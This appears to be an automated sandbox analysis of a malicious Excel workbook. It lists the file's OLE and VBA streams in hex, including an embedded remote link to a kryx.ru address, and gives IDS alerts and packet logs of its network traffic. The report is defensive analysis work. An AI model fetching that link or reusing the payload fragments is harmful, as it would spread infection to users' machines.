                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/MBD00321A49/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:13665
                                    Entropy:7.1661074658165225
                                    Base64 Encoded:True
                                    Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:392615
                                    Entropy:7.73377528201003
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    General
                                    Stream Path:MBD00C9763B/\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:662
                                    Entropy:5.089050631517283
                                    Base64 Encoded:False
                                    Data ASCII:. . . . C . i x . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . k . r . y . x . . . r . u . / . e . 3 . E . P . l . 0 . ? . & . c . e . r . t . i . f . i . c . a . t . i . o . n . = . e . x . c . l . u . s . i . v . e . & . k . i . t . t . y . = . t . h . i . n . k . a . b . l . e . . . D . A . m w P # . | - . - t # . + E X 3 a R { % . N o J 7 . Q E | . % v ] . . . a l | ! h E d . . z L . . . ; R F . . . . . . . . . . . . . . . . F . . . x . c . q . 0 . h . H . Y . X . 2 .
                                    Data Raw:01 00 00 02 b3 d0 c4 43 90 0f 69 78 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ec 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6b 00 72 00 79 00 78 00 2e 00 72 00 75 00 2f 00 65 00 33 00 45 00 50 00 6c 00 30 00 3f 00 26 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 3d 00 65 00 78 00
                                    General
                                    Stream Path:Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:96243
                                    Entropy:7.9920296999361415
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . M q . n 1 . w _ E U ? R . . . d H V . . . $ & } / . . . . . . . . . . w . . . \\ . p . u ^ . . . . ^ Q . & . 1 % g ] A [ g . L O ~ C q . . L H . V F I . j s , . S z i Z a 9 . A $ . J . # . T - # * . G p A . + 4 . . B . . . a . . . . . . = . . . @ . . . . . . / 3 . . . . . 3 . . . . . @ . . . . . W . . . . s a . . . . e . . . m = . . . . P . 9 @ . _ . @ . . . . x . . . . " . . . . . . . . e | . . . j . . . 9 ` 1 . . . . [ . ) . _ A . . . [ ' . . X 1 . . .
                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 4d b1 71 1e 6e c0 fc 9d f1 c6 fe a7 e0 92 a5 d5 31 c3 87 77 5f 45 55 3f df 52 0c c8 93 0b 64 48 56 0c 0d d0 af 24 de 26 7d fe 84 84 2f b7 fe e8 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 77 ad e2 00 00 00 5c 00 70 00 75 86 5e 86 d3 93 1d e2 f2 b5 16 d9 b1 91 5e 51 c9 0b 91 26 07 85 31 25 83 67
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                    CLSID:
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:525
                                    Entropy:5.197714347380842
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 8 F 3 A 6 E 9 F - 1 9 9 F - 4 9 5 E - B 5 F B - B E 8 7 6 4 8 B 0 E 8 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 2 5 0 4 D D 1 0 F D 5 0 F D 5 0
                                    Data Raw:49 44 3d 22 7b 38 46 33 41 36 45 39 46 2d 31 39 39 46 2d 34 39 35 45 2d 42 35 46 42 2d 42 45 38 37 36 34 38 42 30 45 38 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                    CLSID:
                                    File Type:data
                                    Stream Size:104
                                    Entropy:3.0488640812019017
                                    Base64 Encoded:False
                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                    CLSID:
                                    File Type:data
                                    Stream Size:2644
                                    Entropy:3.992573102057176
                                    Base64 Encoded:False
                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                    CLSID:
                                    File Type:data
                                    Stream Size:553
                                    Entropy:6.360492237373647
                                    Base64 Encoded:True
                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e7 1d ef 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                    Network Behavior

                                    Download Network PCAP: filteredfull

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-03-17T09:43:18.559061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.95854213.107.253.72443TCP
                                    2025-03-17T09:43:24.796444+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.95854413.107.253.72443TCP
                                    2025-03-17T09:43:24.811495+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.95854313.107.253.72443TCP

                                    Network Port Distribution

                                    • Total Packets: 203
                                    • 443 (HTTPS)
                                    • 80 (HTTP)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 17, 2025 09:42:22.742979050 CET5853153192.168.2.91.1.1.1
                                    Mar 17, 2025 09:42:22.747700930 CET53585311.1.1.1192.168.2.9
                                    Mar 17, 2025 09:42:22.750613928 CET5853153192.168.2.91.1.1.1
                                    Mar 17, 2025 09:42:22.757451057 CET53585311.1.1.1192.168.2.9
                                    Mar 17, 2025 09:42:23.225125074 CET5853153192.168.2.91.1.1.1
                                    Mar 17, 2025 09:42:23.241997957 CET53585311.1.1.1192.168.2.9
                                    Mar 17, 2025 09:42:23.242054939 CET5853153192.168.2.91.1.1.1
                                    Mar 17, 2025 09:43:03.017649889 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.017694950 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:03.017765999 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.018095016 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.018106937 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:03.705368996 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:03.705542088 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.709801912 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.709821939 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:03.710175991 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:03.710236073 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.710690022 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:03.756319046 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:04.024261951 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:04.024369955 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:04.024419069 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:04.024447918 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:04.028989077 CET58538443192.168.2.9188.225.72.170
                                    Mar 17, 2025 09:43:04.029005051 CET44358538188.225.72.170192.168.2.9
                                    Mar 17, 2025 09:43:04.030790091 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:43:04.035485029 CET8058539198.12.89.24192.168.2.9
                                    Mar 17, 2025 09:43:04.035595894 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:43:04.035775900 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:43:04.040637970 CET8058539198.12.89.24192.168.2.9
                                    Mar 17, 2025 09:43:04.503024101 CET8058539198.12.89.24192.168.2.9
                                    Mar 17, 2025 09:43:04.503058910 CET8058539198.12.89.24192.168.2.9
                                    Mar 17, 2025 09:43:04.503395081 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:43:09.503743887 CET8058539198.12.89.24192.168.2.9
                                    Mar 17, 2025 09:43:09.506757975 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:43:17.874387980 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:17.874429941 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:17.874598026 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:17.875194073 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:17.875210047 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.558990955 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.559061050 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.561101913 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.561115980 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.561378002 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.562810898 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.604330063 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.684273958 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.684313059 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.684340000 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.684390068 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.684402943 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.684432983 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.684459925 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.768425941 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.768455029 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.768508911 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.768529892 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.768574953 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.768593073 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.774907112 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.774924994 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.774977922 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.774983883 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.775017977 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.861195087 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.861217022 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.861258984 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.861273050 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.861329079 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.862469912 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.862483978 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.862549067 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.862560034 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.862643003 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.864190102 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.864206076 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.864263058 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.864269972 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.864329100 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.865856886 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.865873098 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.865917921 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.865925074 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.865950108 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.865978003 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.949505091 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.949526072 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.949598074 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.949608088 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.949645042 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.950212002 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.950234890 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.950282097 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.950288057 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.950315952 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.950336933 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.951280117 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.951297998 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.951334000 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.951340914 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.951373100 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.951394081 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.952272892 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952291012 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952338934 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.952344894 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952354908 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952379942 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952409029 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.952415943 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.952435970 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.952467918 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.956768990 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.956788063 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.956851006 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:18.956857920 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:18.956974030 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.040318012 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040350914 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040400028 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.040416956 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040458918 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.040476084 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.040646076 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040663958 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040714979 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.040721893 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.040776968 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.041151047 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041168928 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041212082 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.041218042 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041245937 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.041270971 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.041676998 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041696072 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041750908 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.041757107 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.041861057 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042438984 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042454004 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042510033 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042515993 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042557955 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042557955 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042684078 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042701006 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042747974 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042752981 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.042836905 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.042836905 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.047102928 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.047121048 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.047178984 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.047184944 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.047215939 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.047230959 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.130722046 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.130742073 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.130810022 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.130829096 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.130908966 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.130947113 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.130964994 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131007910 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131015062 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131043911 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131063938 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131263018 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131278992 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131333113 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131340981 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131386995 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131510973 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131529093 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131589890 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131596088 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131793976 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131848097 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131865978 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131901026 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131905079 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131916046 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131937981 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131938934 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131954908 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.131959915 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.131994009 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.132021904 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.132139921 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.132163048 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.132194042 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.132199049 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.132224083 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.132241011 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.137697935 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.137716055 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.137785912 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.137792110 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.137837887 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.221478939 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.221503019 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.221575022 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.221590042 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.221637964 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222206116 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222223997 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222286940 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222299099 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222345114 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222538948 CET4435854213.107.253.72192.168.2.9
